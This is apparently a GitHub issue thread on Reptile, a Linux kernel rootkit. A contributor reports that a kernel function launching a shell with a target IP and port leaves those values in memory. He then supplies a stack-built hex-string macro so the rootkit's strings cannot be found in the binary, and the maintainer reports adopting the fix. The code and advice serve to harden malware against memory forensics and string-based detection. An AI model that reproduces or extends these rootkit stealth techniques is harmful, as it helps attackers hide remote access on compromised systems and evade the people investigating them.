Memory leak

[milabs]

void shell_execer(struct work_struct *work) {
        struct shell_task *task = (struct shell_task *)work;
        char *argv[] = { task->path, "-t", task->ip, "-p", task->port, NULL };

        exec(argv);
        if(task) {
        bzero(task->path, strlen(task->path));   <<-- task->path leak
        bzero(task->ip, strlen(task->ip));       <<-- task->{ip,port} leak
        bzero(task->port, strlen(task->port));  
        kfree(task);
    }
}

[f0rb1dd3n]

@milabs,

Thanks for reporting that. You got the point, and I will fix it. But I think I have to consider obfuscation in general. Since Reptile doesn't have any obfuscation, just prevent these leaks will not work.

I think there is another leakages like that and some weakness on my code. What do you think about it?

[milabs]

What's common in obfuscation and programming bugs?

[f0rb1dd3n]

if I want to prevent memory leaks, I have to obfuscate strings first too, cause someone can retrieve information just searching for strings in binary.

[milabs]

// echo -ne 'helloworld\n' | hexdump -ve '"%08x\n"'
#define STR$helloworld \
({ \
 unsigned int *p = (unsigned int *)__builtin_alloca( 3 * 4 ); \
 p[0] = 0x6c6c6568; \
 p[1] = 0x726f776f; \
 p[2] = 0x000a646c; \
 (char *)p; \
})
...
printf(STR$helloworld);

Catch the idea and don't forget to add credits on me.

[f0rb1dd3n]

thanks bro,

That's the point, I will consider to do all that improvements. And don't worry about credits. Thx

[f0rb1dd3n]

fixed in ed2ce1d